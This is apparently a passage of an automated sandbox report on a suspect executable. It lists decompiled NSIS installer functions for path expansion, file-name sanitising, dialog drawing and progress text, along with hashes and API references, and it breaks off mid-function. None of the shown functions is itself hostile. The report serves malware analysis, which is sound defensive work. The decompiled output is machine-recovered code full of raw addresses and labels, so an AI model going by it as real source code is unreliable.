                • Opcode Fuzzy Hash: c8a07bbf3a544e04db1531592beb9b39ed12da8dfdba65436ce2583c9172ea3a
                • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040618A, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                Download Yara Rule
                C-Code - Quality: 72%
                			E0040618A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x42ebfc; // 0x739685
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x42f478;
				_t39 = 0x42e3c0;
				_t90 = 0x42e3c0;
				if(_a4 >= 0x42e3c0 && _a4 - 0x42e3c0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E0040618A(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3c0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E004060F7(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E00406055(_t90,  *0x42f428);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E004063D2(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f42c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4c4;
						if( *0x42f4c4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f424;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f428,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f428,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00405FDE((_t80 & 0x0000003f) +  *0x42f478, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f478, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E0040618A(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E004060F7(_a4, _t39);
			}



























                0x0040618a
                0x0040618a
                0x0040618a
                0x00406190
                0x00406195
                0x00406197
                0x004061a6
                0x004061a6
                0x004061ae
                0x004061af
                0x004061b0
                0x004061b1
                0x004061b4
                0x004061bc
                0x004061be
                0x004061d5
                0x004061d8
                0x004061d8
                0x004063af
                0x004063af
                0x004063b3
                0x00000000
                0x00000000
                0x004061e5
                0x004061eb
                0x00000000
                0x00000000
                0x004061f1
                0x004061f2
                0x004061f5
                0x004061f8
                0x004063a2
                0x004063ac
                0x004063ae
                0x004063ae
                0x004063a4
                0x004063a6
                0x004063a8
                0x004063a9
                0x004063a9
                0x00000000
                0x004063a2
                0x004061fe
                0x00406202
                0x00406212
                0x00406219
                0x0040621c
                0x00406224
                0x00406227
                0x0040622e
                0x0040622f
                0x00406232
                0x0040634f
                0x00406352
                0x00406382
                0x00406385
                0x0040638a
                0x0040638e
                0x0040638e
                0x00406393
                0x00406399
                0x0040639b
                0x00000000
                0x0040639b
                0x00406354
                0x00406357
                0x0040636c
                0x00406373
                0x00406359
                0x00406360
                0x00406360
                0x0040637b
                0x0040637e
                0x00406347
                0x00406348
                0x00406348
                0x00000000
                0x0040637e
                0x00406238
                0x0040623f
                0x00406241
                0x00406242
                0x0040625c
                0x0040625c
                0x00406263
                0x00406263
                0x0040626a
                0x0040626e
                0x0040626e
                0x0040626f
                0x00406271
                0x004062aa
                0x004062ad
                0x004062bd
                0x004062c0
                0x004062c8
                0x004062ce
                0x004062ce
                0x0040632d
                0x0040632d
                0x0040632f
                0x00000000
                0x00000000
                0x004062d2
                0x004062d9
                0x004062da
                0x004062dc
                0x004062f6
                0x00406304
                0x0040630a
                0x0040630c
                0x0040632a
                0x0040632a
                0x0040632a
                0x00000000
                0x0040632a
                0x00406312
                0x0040631b
                0x0040631e
                0x00406324
                0x00406328
                0x00000000
                0x00000000
                0x00000000
                0x00406328
                0x004062de
                0x004062e1
                0x00000000
                0x00000000
                0x004062f0
                0x004062f2
                0x004062f4
                0x00000000
                0x00000000
                0x00000000
                0x004062f4
                0x00000000
                0x0040632d
                0x004062b5
                0x00000000
                0x00406273
                0x0040628e
                0x00406293
                0x00406296
                0x00406336
                0x00406336
                0x0040633a
                0x00406342
                0x00406342
                0x00000000
                0x0040633a
                0x004062a0
                0x00406331
                0x00406331
                0x00406334
                0x00000000
                0x00000000
                0x00000000
                0x00406334
                0x00406271
                0x00406244
                0x00406248
                0x00000000
                0x00000000
                0x0040624a
                0x0040624e
                0x00000000
                0x00000000
                0x00406250
                0x00406254
                0x00000000
                0x00406256
                0x00406256
                0x00000000
                0x00406256
                0x00406254
                0x004063b9
                0x004063c3
                0x004063cf
                0x004063cf
                0x00000000

                APIs
                • GetSystemDirectoryA.KERNEL32 ref: 004062B5
                • GetWindowsDirectoryA.KERNEL32(Cgrlcpdlsle,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                • SHGetSpecialFolderLocation.SHELL32(00405256,7519EA30,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                • SHGetPathFromIDListA.SHELL32(7519EA30,Cgrlcpdlsle), ref: 00406312
                • CoTaskMemFree.OLE32(7519EA30), ref: 0040631E
                • lstrcatA.KERNEL32(Cgrlcpdlsle,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                • lstrlenA.KERNEL32(Cgrlcpdlsle,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00422848,7519EA30), ref: 00406394
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                • String ID: Cgrlcpdlsle$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                • API String ID: 717251189-3367223608
                • Opcode ID: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                • Opcode Fuzzy Hash: b81506d31a7a79703f981676f635a9404e1a7eaaabc2c3c435cbfeb6c21f0a75
                • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004063D2, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004063D2(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405AFC(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405ABA("*?|<>/\":", _t5))) == 0) {
							E00405C4B(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                0x004063d4
                0x004063dc
                0x004063f0
                0x004063f0
                0x004063f6
                0x00406403
                0x00406403
                0x00406404
                0x00406406
                0x0040640a
                0x0040640c
                0x00406415
                0x00406417
                0x00406431
                0x00406439
                0x00406439
                0x0040643e
                0x00406440
                0x00406442
                0x00406446
                0x00406447
                0x0040644a
                0x00406452
                0x00406454
                0x00406458
                0x00000000
                0x00000000
                0x0040645e
                0x00406463
                0x00000000
                0x00000000
                0x00000000
                0x00406463
                0x00406468

                APIs
                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                • CharNextA.USER32(?,"C:\Users\user\Desktop\bGf2H3tXGg.exe" ,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                • CharPrevA.USER32(?,?,7519FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 004063D3
                • *?|<>/":, xrefs: 0040641A
                • "C:\Users\user\Desktop\bGf2H3tXGg.exe" , xrefs: 0040640E
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Char$Next$Prev
                • String ID: "C:\Users\user\Desktop\bGf2H3tXGg.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                • API String ID: 589700163-1922592958
                • Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                • Instruction ID: ed52d7626cbd5fe55056ecced6ac67fd73520a103458dc51ec5e44788bc33e0d
                • Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
                • Instruction Fuzzy Hash: 6B1104518047A169FB3207380C40B7B7F888B97764F1A447FE8C6722C2C67C5CA796AD
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004041E2, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004041E2(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                0x004041f4
                0x004042aa
                0x00000000
                0x004042aa
                0x00404205
                0x00404209
                0x00000000
                0x00404223
                0x00404223
                0x0040422c
                0x00000000
                0x00000000
                0x0040422e
                0x0040423a
                0x0040423d
                0x0040423d
                0x00404243
                0x00404249
                0x00404249
                0x00404255
                0x0040425b
                0x00404262
                0x00404265
                0x00404268
                0x0040426a
                0x0040426a
                0x00404272
                0x00404278
                0x00404278
                0x00404282
                0x00404287
                0x0040428a
                0x0040428f
                0x00404292
                0x00404292
                0x004042a2
                0x004042a2
                0x00000000
                0x004042a5

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                • String ID:
                • API String ID: 2320649405-0
                • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040521E, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040521E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec04; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f4f4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E0040618A(0, _t39, 0x42a070, 0x42a070, _a4);
					}
					_t26 = lstrlenA(0x42a070);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ebe8, 0x42a070);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a070;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a070)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a070, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                0x00405224
                0x00405230
                0x00405233
                0x00405239
                0x00405245
                0x00405248
                0x0040524b
                0x00405251
                0x00405251
                0x00405257
                0x0040525f
                0x00405262
                0x0040527f
                0x00405283
                0x0040528c
                0x0040528c
                0x00405296
                0x0040529f
                0x004052ab
                0x004052b2
                0x004052b6
                0x004052b9
                0x004052cc
                0x004052da
                0x004052da
                0x004052de
                0x004052e0
                0x004052e3
                0x00000000
                0x004052e3
                0x00405264
                0x0040526c
                0x00405274
                0x0040527a
                0x00000000
                0x0040527a
                0x00405274
                0x00405262
                0x004052ed

                APIs
                • lstrlenA.KERNEL32(0042A070,00000000,00422848,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                • lstrlenA.KERNEL32(00403233,0042A070,00000000,00422848,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422848,7519EA30), ref: 0040527A
                • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                • SendMessageA.USER32 ref: 004052B2
                • SendMessageA.USER32 ref: 004052CC
                • SendMessageA.USER32 ref: 004052DA
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                • String ID:
                • API String ID: 2531174081-0
                • Opcode ID: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                • Opcode Fuzzy Hash: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404ACE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00404ACE(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                0x00404adc
                0x00404ae9
                0x00404aef
                0x00404b2d
                0x00404b2d
                0x00404b3c
                0x00404b43
                0x00000000
                0x00404b45
                0x00404af1
                0x00404b00
                0x00404b08
                0x00404b0b
                0x00404b1d
                0x00404b23
                0x00404b2a
                0x00000000
                0x00404b2a
                0x00000000

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Message$Send$ClientScreen
                • String ID: f
                • API String ID: 41195575-1993550816
                • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402DBA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x41d440; // 0x63200
					_t11 =  *0x42944c;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                0x00402dc7
                0x00402dd5
                0x00402ddb
                0x00402ddb
                0x00402de9
                0x00402deb
                0x00402df1
                0x00402df8
                0x00402dfa
                0x00402dfa
                0x00402e10
                0x00402e20
                0x00402e32
                0x00402e32
                0x00402e3a

                APIs
                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                • MulDiv.KERNEL32(00063200,00000064,?), ref: 00402E00
                • wsprintfA.USER32 ref: 00402E10
                • SetWindowTextA.USER32(?,?), ref: 00402E20
                • SetDlgItemTextA.USER32 ref: 00402E32
                Strings
                • verifying installer: %d%%, xrefs: 00402E0A
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Text$ItemTimerWindowwsprintf
                • String ID: verifying installer: %d%%
                • API String ID: 1451636040-82062127
                • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                Download Yara Rule
                C-Code - Quality: 86%
                			E004027DF(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405AFC(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405C6B(_t50);
				_t26 = E00405C90(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f438;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403300(_t45);
						E004032EA(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
